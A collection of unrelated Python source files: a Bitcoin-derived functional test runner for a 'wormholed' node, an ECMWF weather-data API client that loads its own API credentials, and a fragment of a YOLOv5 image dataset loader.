TxOutputBinType(amount=vout['value'], script_pubkey=bfh(vout['scriptPubKey']))
for vout in d['outputs']
]
return t
|
test_runner.py
|
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Copyright (c) 2017 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Run regression test suite.
This module calls down into individual test cases via subprocess. It will
forward all unrecognized arguments onto the individual test scripts.
Functional tests are disabled on Windows by default. Use --force to run them anyway.
For a description of arguments recognized by test scripts, see
`test/functional/test_framework/test_framework.py:BitcoinTestFramework.main`.
"""
import argparse
from collections import deque
import configparser
import datetime
import os
import time
import shutil
import sys
import subprocess
import tempfile
import re
import logging
import xml.etree.ElementTree as ET
import json
import threading
import multiprocessing
from queue import Queue, Empty
# Formatting. Default colors to empty strings.
BOLD, BLUE, RED, GREY = ("", ""), ("", ""), ("", ""), ("", "")
try:
# Make sure python thinks it can write unicode to its stdout
"\u2713".encode("utf_8").decode(sys.stdout.encoding)
TICK = "✓ "
CROSS = "✖ "
CIRCLE = "○ "
except UnicodeDecodeError:
TICK = "P "
CROSS = "x "
CIRCLE = "o "
if os.name == 'posix':
# primitive formatting on supported
# terminal via ANSI escape sequences:
BOLD = ('\033[0m', '\033[1m')
BLUE = ('\033[0m', '\033[0;34m')
RED = ('\033[0m', '\033[0;31m')
GREY = ('\033[0m', '\033[1;30m')
TEST_EXIT_PASSED = 0
TEST_EXIT_SKIPPED = 77
NON_SCRIPTS = [
# These are python files that live in the functional tests directory, but are not test scripts.
"combine_logs.py",
"create_cache.py",
"test_runner.py",
]
TEST_PARAMS = {
# Some test can be run with additional parameters.
# When a test is listed here, the it will be run without parameters
# as well as with additional parameters listed here.
# This:
# example "testName" : [["--param1", "--param2"] , ["--param3"]]
# will run the test 3 times:
# testName
# testName --param1 --param2
# testname --param3
"wallet_txn_doublespend.py": [["--mineblock"]],
"wallet_txn_clone.py": [["--mineblock"]],
"wallet_multiwallet.py": [["--usecli"]],
}
# Used to limit the number of tests, when list of tests is not provided on command line
# When --extended is specified, we run all tests, otherwise
# we only run a test if its execution time in seconds does not exceed EXTENDED_CUTOFF
DEFAULT_EXTENDED_CUTOFF = 40
DEFAULT_JOBS = (multiprocessing.cpu_count() // 3) + 1
class TestCase():
"""
Data structure to hold and run information necessary to launch a test case.
"""
def __init__(self, test_num, test_case, tests_dir, tmpdir, flags=None):
self.tests_dir = tests_dir
self.tmpdir = tmpdir
self.test_case = test_case
self.test_num = test_num
self.flags = flags
def run(self, portseed_offset):
t = self.test_case
portseed = self.test_num + portseed_offset
portseed_arg = ["--portseed={}".format(portseed)]
log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16)
log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16)
test_argv = t.split()
testdir = os.path.join("{}", "{}_{}").format(
self.tmpdir, re.sub(".py$", "", test_argv[0]), portseed)
tmpdir_arg = ["--tmpdir={}".format(testdir)]
name = t
time0 = time.time()
process = subprocess.Popen([sys.executable, os.path.join(self.tests_dir, test_argv[0])] + test_argv[1:] + self.flags + portseed_arg + tmpdir_arg,
universal_newlines=True,
stdout=log_stdout,
stderr=log_stderr)
process.wait()
log_stdout.seek(0), log_stderr.seek(0)
[stdout, stderr] = [l.read().decode('utf-8')
for l in (log_stdout, log_stderr)]
log_stdout.close(), log_stderr.close()
if process.returncode == TEST_EXIT_PASSED and stderr == "":
status = "Passed"
elif process.returncode == TEST_EXIT_SKIPPED:
status = "Skipped"
else:
status = "Failed"
return TestResult(self.test_num, name, testdir, status, int(time.time() - time0), stdout, stderr)
def on_ci():
return os.getenv('TRAVIS') == 'true' or os.getenv('TEAMCITY_VERSION') != None
def main():
# Read config generated by configure.
config = configparser.ConfigParser()
configfile = os.path.join(os.path.abspath(
os.path.dirname(__file__)), "..", "config.ini")
config.read_file(open(configfile, encoding="utf8"))
src_dir = config["environment"]["SRCDIR"]
build_dir = config["environment"]["BUILDDIR"]
tests_dir = os.path.join(src_dir, 'test', 'functional')
# Parse arguments and pass through unrecognised args
parser = argparse.ArgumentParser(add_help=False,
usage='%(prog)s [test_runner.py options] [script options] [scripts]',
description=__doc__,
epilog='''
Help text and arguments for individual test script:''',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--combinedlogslen', '-c', type=int, default=0,
help='print a combined log (of length n lines) from all test nodes and test framework to the console on failure.')
parser.add_argument('--coverage', action='store_true',
help='generate a basic coverage report for the RPC interface')
parser.add_argument(
'--exclude', '-x', help='specify a comma-separated-list of scripts to exclude.')
parser.add_argument('--extended', action='store_true',
help='run the extended test suite in addition to the basic tests')
parser.add_argument('--cutoff', type=int, default=DEFAULT_EXTENDED_CUTOFF,
help='set the cutoff runtime for what tests get run')
parser.add_argument('--force', '-f', action='store_true',
help='run tests even on platforms where they are disabled by default (e.g. windows).')
parser.add_argument('--help', '-h', '-?',
action='store_true', help='print help text and exit')
parser.add_argument('--jobs', '-j', type=int, default=DEFAULT_JOBS,
help='how many test scripts to run in parallel.')
parser.add_argument('--keepcache', '-k', action='store_true',
help='the default behavior is to flush the cache directory on startup. --keepcache retains the cache from the previous testrun.')
parser.add_argument('--quiet', '-q', action='store_true',
help='only print results summary and failure logs')
parser.add_argument('--tmpdirprefix', '-t',
default=tempfile.gettempdir(), help="Root directory for datadirs")
parser.add_argument('--junitoutput', '-J',
default=os.path.join(build_dir, 'junit_results.xml'), help="file that will store JUnit formatted test results.")
args, unknown_args = parser.parse_known_args()
# args to be passed on always start with two dashes; tests are the
# remaining unknown args
tests = [arg for arg in unknown_args if arg[:2] != "--"]
passon_args = [arg for arg in unknown_args if arg[:2] == "--"]
passon_args.append("--configfile={}".format(configfile))
# Set up logging
logging_level = logging.INFO if args.quiet else logging.DEBUG
logging.basicConfig(format='%(message)s', level=logging_level)
# Create base test directory
tmpdir = os.path.join("{}", "bitcoin_test_runner_{:%Y%m%d_%H%M%S}").format(
args.tmpdirprefix, datetime.datetime.now())
os.makedirs(tmpdir)
logging.debug("Temporary test directory at {}".format(tmpdir))
enable_wallet = config["components"].getboolean("ENABLE_WALLET")
enable_utils = config["components"].getboolean("ENABLE_UTILS")
enable_bitcoind = config["components"].getboolean("ENABLE_BITCOIND")
if config["environment"]["EXEEXT"] == ".exe" and not args.force:
# https://github.com/bitcoin/bitcoin/commit/d52802551752140cf41f0d9a225a43e84404d3e9
# https://github.com/bitcoin/bitcoin/pull/5677#issuecomment-136646964
print(
"Tests currently disabled on Windows by default. Use --force option to enable")
sys.exit(0)
if not (enable_wallet and enable_utils and enable_bitcoind):
print(
"No functional tests to run. Wallet, utils, and bitcoind must all be enabled")
print(
"Rerun `configure` with -enable-wallet, -with-utils and -with-daemon and rerun make")
sys.exit(0)
# Build list of tests
all_scripts = get_all_scripts_from_disk(tests_dir, NON_SCRIPTS)
# Check all tests with parameters actually exist
for test in TEST_PARAMS:
if not test in all_scripts:
print("ERROR: Test with parameter {} does not exist, check it has "
"not been renamed or deleted".format(test))
sys.exit(1)
if tests:
# Individual tests have been specified. Run specified tests that exist
# in the all_scripts list. Accept the name with or without .py
# extension.
individual_tests = [
re.sub(r"\.py$", "", t) + ".py" for t in tests if not t.endswith('*')]
test_list = []
for t in individual_tests:
if t in all_scripts:
test_list.append(t)
else:
print("{}WARNING!{} Test '{}' not found in full test list.".format(
BOLD[1], BOLD[0], t))
# Allow for wildcard at the end of the name, so a single input can
# match multiple tests
for test in tests:
if test.endswith('*'):
test_list.extend(
[t for t in all_scripts if t.startswith(test[:-1])])
# do not cut off explicitly specified tests
cutoff = sys.maxsize
else:
# No individual tests have been specified.
# Run all tests that do not exceed
test_list = all_scripts
cutoff = args.cutoff
if args.extended:
cutoff = sys.maxsize
# Remove the test cases that the user has explicitly asked to exclude.
if args.exclude:
tests_excl = [re.sub(r"\.py$", "", t) +
".py" for t in args.exclude.split(',')]
for exclude_test in tests_excl:
if exclude_test in test_list:
test_list.remove(exclude_test)
else:
print("{}WARNING!{} Test '{}' not found in current test list.".format(
BOLD[1], BOLD[0], exclude_test))
# Update timings from build_dir only if separate build directory is used.
# We do not want to pollute source directory.
build_timings = None
if (src_dir != build_dir):
build_timings = Timings(os.path.join(build_dir, 'timing.json'))
# Always use timings from scr_dir if present
src_timings = Timings(os.path.join(
src_dir, "test", "functional", 'timing.json'))
# Add test parameters and remove long running tests if needed
test_list = get_tests_to_run(
test_list, TEST_PARAMS, cutoff, src_timings)
if not test_list:
print("No valid test scripts specified. Check that your test is in one "
"of the test lists in test_runner.py, or run test_runner.py with no arguments to run all tests")
sys.exit(0)
if args.help:
# Print help for test_runner.py, then print help of the first script
# and exit.
parser.print_help()
subprocess.check_call(
[sys.executable, os.path.join(tests_dir, test_list[0]), '-h'])
sys.exit(0)
if not args.keepcache:
shutil.rmtree(os.path.join(build_dir, "test",
"cache"), ignore_errors=True)
run_tests(test_list, build_dir, tests_dir, args.junitoutput,
tmpdir, args.jobs, args.coverage, passon_args, args.combinedlogslen, build_timings)
def run_tests(test_list, build_dir, tests_dir, junitoutput, tmpdir, num_jobs, enable_coverage=False, args=[], combined_logs_len=0, build_timings=None):
# Warn if bitcoind is already running (unix only)
try:
pidofOutput = subprocess.check_output(["pidof", "wormholed"])
if pidofOutput is not None and pidofOutput != b'':
print("%sWARNING!%s There is already a wormholed process running on this system. Tests may fail unexpectedly due to resource contention!" % (
BOLD[1], BOLD[0]))
except (OSError, subprocess.SubprocessError):
pass
# Warn if there is a cache directory
cache_dir = os.path.join(build_dir, "test", "cache")
if os.path.isdir(cache_dir):
print("{}WARNING!{} There is a cache directory here: {}. If tests fail unexpectedly, try deleting the cache directory.".format(
BOLD[1], BOLD[0], cache_dir))
# Set env vars
if "BITCOIND" not in os.environ:
os.environ["BITCOIND"] = os.path.join(
build_dir, 'src', 'wormholed' + exeext)
os.environ["BITCOINCLI"] = os.path.join(
build_dir, 'src', 'wormholed-cli' + exeext)
flags = [os.path.join("--srcdir={}".format(build_dir), "src")] + args
flags.append("--cachedir={}".format(cache_dir))
if enable_coverage:
coverage = RPCCoverage()
flags.append(coverage.flag)
logging.debug(
"Initializing coverage directory at {}".format(coverage.dir))
else:
coverage = None
if len(test_list) > 1 and num_jobs > 1:
# Populate cache
try:
subprocess.check_output([sys.executable, os.path.join(
tests_dir, 'create_cache.py')] + flags + [os.path.join("--tmpdir={}", "cache") .format(tmpdir)])
except subprocess.CalledProcessError as e:
sys.stdout.buffer.write(e.output)
raise
# Run Tests
time0 = time.time()
test_results = execute_test_processes(
num_jobs, test_list, tests_dir, tmpdir, flags)
runtime = int(time.time() - time0)
max_len_name = len(max(test_list, key=len))
print_results(test_results, tests_dir, max_len_name,
runtime, combined_logs_len)
save_results_as_junit(test_results, junitoutput, runtime)
if (build_timings is not None):
build_timings.save_timings(test_results)
if coverage:
coverage.report_rpc_coverage()
logging.debug("Cleaning up coverage data")
coverage.cleanup()
# Clear up the temp directory if all subdirectories are gone
if not os.listdir(tmpdir):
os.rmdir(tmpdir)
all_passed = all(
map(lambda test_result: test_result.was_successful, test_results))
sys.exit(not all_passed)
def execute_test_processes(num_jobs, test_list, tests_dir, tmpdir, flags):
update_queue = Queue()
job_queue = Queue()
test_results = []
poll_timeout = 10 # seconds
# In case there is a graveyard of zombie bitcoinds, we can apply a
# pseudorandom offset to hopefully jump over them.
# (625 is PORT_RANGE/MAX_NODES)
portseed_offset = int(time.time() * 1000) % 625
##
# Define some helper functions we will need for threading.
##
def handle_message(message, running_jobs):
"""
handle_message handles a single message from handle_test_cases
"""
if isinstance(message, TestCase):
running_jobs.append((message.test_num, message.test_case))
print("{}{}{} started".format(BOLD[1], message.test_case, BOLD[0]))
return
if isinstance(message, TestResult):
test_result = message
running_jobs.remove((test_result.num, test_result.name))
test_results.append(test_result)
if test_result.status == "Passed":
print("{}{}{} passed, Duration: {} s".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
elif test_result.status == "Skipped":
print("{}{}{} skipped".format(
BOLD[1], test_result.name, BOLD[0]))
else:
print("{}{}{} failed, Duration: {} s\n".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
print(BOLD[1] + 'stdout:' + BOLD[0])
print(test_result.stdout)
print(BOLD[1] + 'stderr:' + BOLD[0])
print(test_result.stderr)
return
assert False, "we should not be here"
def handle_update_messages():
"""
handle_update_messages waits for messages to be sent from handle_test_cases via the
update_queue. It serializes the results so we can print nice status update messages.
"""
printed_status = False
running_jobs = []
while True:
message = None
try:
message = update_queue.get(True, poll_timeout)
if message is None:
break
# We printed a status message, need to kick to the next line
# before printing more.
if printed_status:
print()
printed_status = False
handle_message(message, running_jobs)
update_queue.task_done()
except Empty:
if not on_ci():
print("Running jobs: {}".format(", ".join([j[1] for j in running_jobs])), end="\r")
sys.stdout.flush()
printed_status = True
def handle_test_cases():
"""
job_runner represents a single thread that is part of a worker pool.
It waits for a test, then executes that test.
It also reports start and result messages to handle_update_messages
"""
while True:
test = job_queue.get()
if test is None:
break
# Signal that the test is starting to inform the poor waiting
# programmer
update_queue.put(test)
result = test.run(portseed_offset)
update_queue.put(result)
job_queue.task_done()
##
# Setup our threads, and start sending tasks
##
# Start our result collection thread.
t = threading.Thread(target=handle_update_messages)
t.setDaemon(True)
t.start()
# Start some worker threads
for j in range(num_jobs):
t = threading.Thread(target=handle_test_cases)
t.setDaemon(True)
t.start()
# Push all our test cases into the job queue.
for i, t in enumerate(test_list):
job_queue.put(TestCase(i, t, tests_dir, tmpdir, flags))
# Wait for all the jobs to be completed
job_queue.join()
# Wait for all the results to be compiled
update_queue.join()
# Flush our queues so the threads exit
update_queue.put(None)
for j in range(num_jobs):
job_queue.put(None)
return test_results
def print_results(test_results, tests_dir, max_len_name, runtime, combined_logs_len):
results = "\n" + BOLD[1] + "{} | {} | {}\n\n".format(
"TEST".ljust(max_len_name), "STATUS ", "DURATION") + BOLD[0]
test_results.sort(key=TestResult.sort_key)
all_passed = True
time_sum = 0
for test_result in test_results:
all_passed = all_passed and test_result.was_successful
time_sum += test_result.time
test_result.padding = max_len_name
results += str(test_result)
testdir = test_result.testdir
if combined_logs_len and os.path.isdir(testdir):
# Print the final `combinedlogslen` lines of the combined logs
print('{}Combine the logs and print the last {} lines ...{}'.format(
BOLD[1], combined_logs_len, BOLD[0]))
print('\n============')
print('{}Combined log for {}:{}'.format(BOLD[1], testdir, BOLD[0]))
print('============\n')
combined_logs, _ = subprocess.Popen([sys.executable, os.path.join(
tests_dir, 'combine_logs.py'), '-c', testdir], universal_newlines=True, stdout=subprocess.PIPE).communicate()
print("\n".join(deque(combined_logs.splitlines(), combined_logs_len)))
status = TICK + "Passed" if all_passed else CROSS + "Failed"
if not all_passed:
results += RED[1]
results += BOLD[1] + "\n{} | {} | {} s (accumulated) \n".format(
"ALL".ljust(max_len_name), status.ljust(9), time_sum) + BOLD[0]
if not all_passed:
results += RED[0]
results += "Runtime: {} s\n".format(runtime)
print(results)
class TestResult():
"""
Simple data structure to store test result values and print them properly
"""
def __init__(self, num, name, testdir, status, time, stdout, stderr):
self.num = num
self.name = name
self.testdir = testdir
self.status = status
self.time = time
self.padding = 0
self.stdout = stdout
self.stderr = stderr
def sort_key(self):
if self.status == "Passed":
return 0, self.name.lower()
elif self.status == "Failed":
return 2, self.name.lower()
elif self.status == "Skipped":
return 1, self.name.lower()
def __repr__(self):
if self.status == "Passed":
color = BLUE
glyph = TICK
elif self.status == "Failed":
color = RED
glyph = CROSS
elif self.status == "Skipped":
color = GREY
glyph = CIRCLE
return color[1] + "{} | {}{} | {} s\n".format(
self.name.ljust(self.padding), glyph, self.status.ljust(7), self.time) + color[0]
@property
def was_successful(self):
return self.status != "Failed"
def get_all_scripts_from_disk(test_dir, non_scripts):
"""
Return all available test script from script directory (excluding NON_SCRIPTS)
"""
python_files = set([t for t in os.listdir(test_dir) if t[-3:] == ".py"])
return list(python_files - set(non_scripts))
def get_tests_to_run(test_list, test_params, cutoff, src_timings):
"""
Returns only test that will not run longer that cutoff.
Long running tests are returned first to favor running tests in parallel
Timings from build directory override those from src directory
"""
def get_test_time(test):
# Return 0 if test is unknown to always run it
return next(
(x['time'] for x in src_timings.existing_timings if x['name'] == test), 0)
# Some tests must also be run with additional parameters. Add them to the list.
tests_with_params = []
for test_name in test_list:
# always execute a test without parameters
tests_with_params.append(test_name)
params = test_params.get(test_name)
if params is not None:
tests_with_params.extend(
[test_name + " " + " ".join(p) for p in params])
result = [t for t in tests_with_params if get_test_time(t) <= cutoff]
result.sort(key=lambda x: (-get_test_time(x), x))
return result
class RPCCoverage():
"""
Coverage reporting utilities for test_runner.
Coverage calculation works by having each test script subprocess write
coverage files into a particular directory. These files contain the RPC
commands invoked during testing, as well as a complete listing of RPC
commands per `bitcoin-cli help` (`rpc_interface.txt`).
After all tests complete, the commands run are combined and diff'd against
the complete list to calculate uncovered RPC commands.
See also: test/functional/test_framework/coverage.py
"""
def __init__(self):
self.dir = tempfile.mkdtemp(prefix="coverage")
self.flag = '--coveragedir={}'.format(self.dir)
def report_rpc_coverage(self):
"""
Print out RPC commands that were unexercised by tests.
"""
uncovered = self._get_uncovered_rpc_commands()
if uncovered:
print("Uncovered RPC commands:")
print("".join((" - {}\n".format(i)) for i in sorted(uncovered)))
else:
print("All RPC commands covered.")
def cleanup(self):
return shutil.rmtree(self.dir)
def _get_uncovered_rpc_commands(self):
"""
Return a set of currently untested RPC commands.
"""
# This is shared from `test/functional/test-framework/coverage.py`
reference_filename = 'rpc_interface.txt'
coverage_file_prefix = 'coverage.'
coverage_ref_filename = os.path.join(self.dir, reference_filename)
coverage_filenames = set()
all_cmds = set()
covered_cmds = set()
if not os.path.isfile(coverage_ref_filename):
raise RuntimeError("No coverage reference found")
with open(coverage_ref_filename, 'r', encoding="utf8") as f:
all_cmds.update([i.strip() for i in f.readlines()])
for root, dirs, files in os.walk(self.dir):
for filename in files:
if filename.startswith(coverage_file_prefix):
coverage_filenames.add(os.path.join(root, filename))
for filename in coverage_filenames:
with open(filename, 'r', encoding="utf8") as f:
covered_cmds.update([i.strip() for i in f.readlines()])
return all_cmds - covered_cmds
def save_results_as_junit(test_results, file_name, time):
"""
Save tests results to file in JUnit format
See http://llg.cubic.org/docs/junit/ for specification of format
"""
e_test_suite = ET.Element("testsuite",
{"name": "bitcoin_abc_tests",
"tests": str(len(test_results)),
# "errors":
"failures": str(len([t for t in test_results if t.status == "Failed"])),
"id": "0",
"skipped": str(len([t for t in test_results if t.status == "Skipped"])),
"time": str(time),
"timestamp": datetime.datetime.now().isoformat('T')
})
for test_result in test_results:
e_test_case = ET.SubElement(e_test_suite, "testcase",
{"name": test_result.name,
"classname": test_result.name,
"time": str(test_result.time)
}
)
if test_result.status == "Skipped":
ET.SubElement(e_test_case, "skipped")
elif test_result.status == "Failed":
ET.SubElement(e_test_case, "failure")
# no special element for passed tests
ET.SubElement(e_test_case, "system-out").text = test_result.stdout
ET.SubElement(e_test_case, "system-err").text = test_result.stderr
ET.ElementTree(e_test_suite).write(
file_name, "UTF-8", xml_declaration=True)
class Timings():
"""
Takes care of loading, merging and saving tests execution times.
"""
def __init__(self, timing_file):
self.timing_file = timing_file
self.existing_timings = self.load_timings()
def load_timings(self):
if os.path.isfile(self.timing_file):
with open(self.timing_file, encoding="utf8") as f:
return json.load(f)
else:
return []
def get_merged_timings(self, new_timings):
"""
Return new list containing existing timings updated with new timings
Tests that do not exists are not removed
"""
key = 'name'
merged = {}
for item in self.existing_timings + new_timings:
if item[key] in merged:
merged[item[key]].update(item)
else:
merged[item[key]] = item
# Sort the result to preserve test ordering in file
merged = list(merged.values())
merged.sort(key=lambda t, key=key: t[key])
return merged
def save_timings(self, test_results):
# we only save test that have passed - timings for failed test might be
# wrong (timeouts or early fails)
passed_results = [t for t in test_results if t.status == 'Passed']
new_timings = list(map(lambda t: {'name': t.name, 'time': t.time},
passed_results))
merged_timings = self.get_merged_timings(new_timings)
with open(self.timing_file, 'w', encoding="utf8") as f:
json.dump(merged_timings, f, indent=True)
if __name__ == '__main__':
main()
|
ECMWFDataServer.py
|
#
# (C) Copyright 2012-2013 ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation nor
# does it submit to any jurisdiction.
#
# (C) Copyright 2017 Ricardo Persoon.
from .exceptions import *
import json
import os
import queue
import threading
import time
from .api_connection import *
from .config import *
from .log import *
class ECMWFDataServer:
def __init__(self, api_url=None, api_key=None, api_email=None, verbose=False, custom_log=None,
custom_log_level=False):
"""
:param api_url: ECMWF API url
:param api_key: authentication API key
:param api_email: e-mail address used to register for the API
:param verbose: not used, but here for backwards compatibility
:param custom_log: custom logging function. If not specified, build-in logging class will be used
:param custom_log_level: whether the provided custom logging function accepts a 2nd parameter with the log
call that specifies the logging level. If not, only 1 parameter string is passed for logging
"""
# Load the configuration file
try:
config.load(os.path.join(os.path.dirname(__file__), 'config.ini'))
except ConfigError as e:
raise DataServerError("Failed to load configuration file config.ini: %s" % e)
# Initialise the logging
if custom_log is None:
self.log_level = True
display_info_messages = config.get_boolean('display_info_messages', 'log')
display_warning_messages = config.get_boolean('display_warning_messages', 'log')
display_error_messages = config.get_boolean('display_error_messages', 'log')
self.log_method = Log(display_info_messages, display_warning_messages, display_error_messages).log
else:
self.log_level = custom_log_level
self.log_method = custom_log
# If API credentials are not passed, try to retrieve the API credentials from the configuration file first
if api_url is None or api_key is None or api_email is None:
try:
api_url = config.get('url', 'api')
api_key = config.get('key', 'api')
api_email = config.get('email', 'api')
except ConfigError:
pass
# If API credentials where not in the configuration file either, retreive them from the ~/.ecmwfapirc file or
# environment
if api_url is None or api_key is None or api_email is None or api_url == 'none' or api_key == 'none' \
or api_email == 'none':
try:
[api_key, api_url, api_email] = self._get_api_key_values()
except APIKeyFetchError as e:
self.log("Failed to retrieve ECMWF API key: %s" % e, 'error')
raise DataServerError("Failed to retrieve ECMWF API key from all sources: %s" % e)
self.api_url = api_url
self.api_key = api_key
self.api_email = api_email
self.transfer_queue = None
self.log("ECMWF API python library %s initialised" % config.get('version', 'client'), 'info')
def log(self, message, level, request_id=None):
"""
Passed to the transfer classes to provide logging, uses available logging method to log messages. This method is
required for backwards compatibility and to support different custom logging functions, either with one (message
only) or two (message and log level) parameters
:param message: message to log
:param level: log level, in [info, warning, error] for the default logging module
:param request_id: optional request id to add to log messages
"""
# Add the request id to the message if it is specified
if isinstance(request_id, int):
message = '(Request %s) %s' % (request_id, message)
if self.log_level:
self.log_method(message, level)
else:
self.log_method("[%s] %s" % (level, message))
def retrieve(self, request_data):
"""
Retrieve a dataset with the given parameters
:param request_data: parameter list for transfer, or list of multiple parameter lists
"""
if isinstance(request_data, dict):
request_data = [request_data]
elif not isinstance(request_data, list):
self.log("The request data object should be a dictionary with the parameters or a list with multiple"
"dictionaries for multiple transfers", 'error')
return
if len(request_data) == 0:
self.log("No requests were given", 'warning')
return
for [index, request] in enumerate(request_data):
if len(request_data) > 1:
self._process_request(request, index + 1)
else:
self._process_request(request, 1)
self.log("ECMWFDataServer completed all requests", 'info')
def retrieve_parallel(self, request_data, parallel_count=None):
"""
Retrieve the given datasets in parallel - the different transfers are ran in parallel, but each individual
dataset is downloaded sequentially
:param request_data: parameter list for transfer, or list of multiple parameter lists
:param parallel_count: maximum number of parallel / concurrent transfers
"""
if isinstance(request_data, dict):
request_data = [request_data]
elif not isinstance(request_data, list):
self.log("The request data object should be a dictionary with the parameters or a list with multiple"
"dictionaries for multiple transfers", 'error')
return
if len(request_data) == 0:
self.log("No requests were given", 'warning')
return
# Determine parallel count
if not isinstance(parallel_count, int):
try:
parallel_count = config.get_int('parallel_count', 'network')
except ConfigError:
self.log("No parallel count given and not set in configuration file either", 'error')
self.transfer_queue = queue.Queue()
# Launch the desired number of threads to process the requests
self.log("Launching %s threads to process transfers" % parallel_count, 'info')
threads = []
for i in range(parallel_count):
t = threading.Thread(target=self._parallel_worker)
t.daemon = True
t.start()
threads.append(t)
# Insert all transfers in the queue
request_id = 1
for transfer in request_data:
self.transfer_queue.put([transfer, request_id])
request_id += 1
# Wait 3 seconds to not make too many API calls
time.sleep(3)
# Add stop indicators to the queue, 1 for each thread
for i in range(parallel_count):
self.transfer_queue.put(None)
# Wait for all threads to complete
for i in range(0, parallel_count):
threads[i].join()
self.log("ECMWFDataServer completed all requests in parallel", 'info')
def _process_request(self, request_data, request_id):
"""
Process the dataset transfer request. Used in both normal and parallel requests.
:param request_data: parameter list for transfer
:param request_id: identification of requests, used when multiple or parallel requests are initialised to inform
the user of the progress and which request is currently processed
"""
try:
disable_ssl_validation = config.get_boolean('disable_ssl_validation', 'network')
except ConfigError:
disable_ssl_validation = False
if request_id is not None:
self.log("Starting request %i" % request_id, 'info', request_id)
else:
self.log("Starting request", 'info', request_id)
try:
connection = ApiConnection(self.api_url, "datasets/%s" % request_data['dataset'], self.api_email,
self.api_key, self.log, disable_ssl_validation=disable_ssl_validation,
request_id=request_id)
connection.transfer_request(request_data, request_data['target'])
except ApiConnectionError as e:
self.log("API connection error: %s" % e, 'error', request_id)
def _parallel_worker(self):
"""
Worker function to process parallel transfers, multiple instances launched in threads
"""
if self.transfer_queue is None:
self.log("No transfer queue specified for parallel transfer", 'error')
while True:
item = self.transfer_queue.get()
# Non item indicates we have to stop
if item is None:
break
elif not isinstance(item, list) or len(item) != 2:
self.log("Invalid transfer item in queue", 'warning')
continue
self._process_request(item[0], item[1])
def _get_api_key_values(self):
"""
Get the API key from the environment or the '.ecmwfapirc' file. The environment is looked at first. Raises
APIKeyFetchError when unable to get the API key from either the environment or the ecmwfapirc file
:return: tuple with the key, url, and email forming our API key
"""
try:
key_values = self._get_api_key_from_environ()
except APIKeyFetchError:
try:
key_values = self._get_api_key_from_rcfile()
except APIKeyFetchError:
raise
return key_values
@staticmethod
def _get_api_key_from_environ():
"""
Obtain the API key from the environment
:return: tuple with API key, url and e-mail
"""
try:
api_key = os.environ['ECMWF_API_KEY']
api_url = os.environ['ECMWF_API_URL']
api_email = os.environ['ECMWF_API_EMAIL']
except KeyError:
raise APIKeyFetchError("ERROR: Could not get the API key from the environment")
return api_key, api_url, api_email
@staticmethod
def _get_api_key_from_rcfile():
"""
Obtain the API key from the file ~/.ecmwfapirc
:return: tuple with API key, url and e-mail
"""
rc = os.path.normpath(os.path.expanduser("~/.ecmwfapirc"))
try:
with open(rc) as f:
api_config = json.load(f)
# Failed reading from file
except IOError as e:
raise APIKeyFetchError(str(e))
# JSON decoding failed
except ValueError:
raise APIKeyFetchError("Missing or malformed API key in '%s'" % rc)
# Unexpected error
except Exception as e:
raise APIKeyFetchError(str(e))
try:
key = api_config['key']
url = api_config['url']
email = api_config['email']
except:
raise APIKeyFetchError("Missing or malformed API key in '%s'" % rc)
return key, url, email
|
datasets.py
|
# Dataset utils and dataloaders
import glob
import logging
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
import pyrealsense2 as rs
from utils.general import xyxy2xywh, xywh2xyxy, xywhn2xyxy, clean_str
from utils.torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng'] # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
logger = logging.getLogger(__name__)
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8, image_weights=False, quad=False, prefix=''):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
